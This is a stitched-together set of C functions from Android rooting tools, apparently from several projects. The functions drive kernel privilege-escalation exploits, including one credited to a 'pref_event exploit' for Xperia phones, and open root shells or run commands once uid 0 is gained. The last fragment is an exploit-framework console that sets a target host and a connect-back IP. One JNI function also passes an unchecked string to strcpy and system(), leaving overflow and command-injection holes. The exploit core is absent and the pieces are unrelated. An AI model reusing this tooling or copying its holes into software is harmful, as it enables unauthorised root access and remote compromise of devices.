JNIEXPORT int JNICALL Java_biz_hagurekamome_rootkitapp_MainActivity_native_1getroot (JNIEnv *env, jobject jo, jlong prepare_kernel_cred_addr, jlong commit_creds_addr, jlong ptmx_fops_addr) { int result; unsigned long prepare_kernel_cred_address; unsigned long commit_creds_address; pid_t pid; prepare_kernel_cred_address = (unsigned long)prepare_kernel_cred_addr; commit_creds_address = (unsigned long)commit_creds_addr; ptmx_fops = (unsigned long)ptmx_fops_addr; prepare_kernel_cred = (void *)prepare_kernel_cred_address; commit_creds = (void *)commit_creds_address; run_exploit(); if (getuid() != 0) { return -1; } return 0; }
int main(int argc, char **argv) { char* command = NULL; int i; for (i = 1; i < argc; i++) { if (!strcmp(argv[i], "-c")) { if (++i < argc) { command = argv[i]; } } } device_detected(); if (!setup_variables()) { printf("Failed to setup variables.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } if (command == NULL) { system("/system/bin/sh"); } else { execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); } exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); exit(EXIT_FAILURE); } if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } system("/system/bin/sh"); exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } system("/system/bin/sh"); exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } system("/system/bin/sh"); exit(EXIT_SUCCESS); }
JNIEXPORT int JNICALL Java_biz_hagurekamome_getroot_MainActivity_native_1getroot (JNIEnv *env, jobject jo, jstring jstr) { char cachebuf[256]; const char *execommand = "/install_tool.sh "; const char *param = " >/data/local/tmp/err.txt 2>&1"; const char *str; int result; str = (*env)->GetStringUTFChars(env, jstr, 0); strcpy(cachebuf, str); strcat(cachebuf, execommand); strcat(cachebuf, str); strcat(cachebuf, param); pid_t pid; if ( !detect_injection_addresses() ){ return -1; } prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred; commit_creds = supported_devices[st_pos].commit_creds; run_exploit(); if (getuid() != 0) { return -2; } result = system(cachebuf); /* result = system("/data/data/biz.hagurekamome.jnitest/cache/install_tool.sh >/data/local/tmp/err.txt 2>&1"); */ if (result != 0){ return result; } return 0; }
int main(int argc, char **argv) { char* command = NULL; int i; for (i = 1; i < argc; i++) { if (!strcmp(argv[i], "-c")) { if (++i < argc) { command = argv[i]; } } } set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); exit(EXIT_FAILURE); } if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } if (command == NULL) { system("/system/bin/sh"); } else { execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); } exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { printf("run_root_shell v2.2\n"); printf("Based on pref_event exploit\n\n"); printf("Modified for auto-rooting by DooMLoRD\n"); printf("Part of Easy Rooting Toolkit\n\n"); printf("Changelog:\n"); printf("v2.0: added support for Xperia S (LT26) {FW: 6.2.B.0.211} [Cust: 1257-8080]\n"); printf("v2.1: added support for Xperia Z (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n"); printf("v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284} [Cust: 1272-1092]\n"); set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); exit(EXIT_FAILURE); } if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } else { printf("Launching auto-root script!\n"); system("/system/bin/sh /data/local/tmp/doomed2"); } exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { pid_t pid; if ( !detect_injection_addresses() ){ return -1; } prepare_kernel_cred = supported_devices[st_pos].prepare_kernel_cred; commit_creds = supported_devices[st_pos].commit_creds; printf("Try Get TempRoot...\n"); run_exploit(); if (getuid() != 0) { printf("Failed to getroot.\n"); exit(EXIT_FAILURE); } printf("Succeeded in getroot!\n"); system(EXECCOMMAND); exit(EXIT_SUCCESS); return 0; }
int parse_command(char *line) { char *token; token = strtok (line, " "); while (token != NULL) { /* set */ if ( strcmp(token, "set") == 0) { token = strtok(NULL, " "); if ( strcmp(token, "target_host") == 0) { token = strtok(NULL, " "); snprintf(target_host, 254, "%s", token); printf("\n%s[!]%s target_host set : %s\n\n", _GREEN, _ENDC, target_host); } if ( strcmp(token, "connect_back_ip") == 0) { token = strtok(NULL, " "); snprintf(connect_back_ip, 254, "%s", token); printf("\n%s[!]%s connect_back_ip set : %s\n\n", _GREEN, _ENDC, connect_back_ip); } } /* show */ if ( strcmp(token, "show") == 0) { token = strtok(NULL, " "); chomp(token); if ( strcmp(token, "exploits") == 0) { show_all_modules_by_type("EXPLOIT"); } } /* use */ if ( strcmp(token, "use") == 0) { token = strtok(NULL, " "); if ( strcmp(token, "exploit") == 0) { token = strtok(NULL, " "); chomp(token); if ( is_int(token) ) { if ( module_exists( atoi(token) ) ) { current_exploit = atoi(token); printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC); } else { printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC); } } else { current_exploit = find_module_by_path(token); if (current_exploit >= 0 ) { printf("\n%s[!]%s exploit ready\n\n", _GREEN, _ENDC); } else { printf("\n%s[!]%s could not find exploit\n\n", _RED, _ENDC); } } } } /* use */ if ( strcmp(token, "exploit") == 0) { if (current_exploit < 0 ) { printf("\n%s[!]%s no exploit set \n\n", _RED, _ENDC); } else { if ( check_exploit_params() ) { run_exploit(); } } } token = strtok(NULL, " "); } }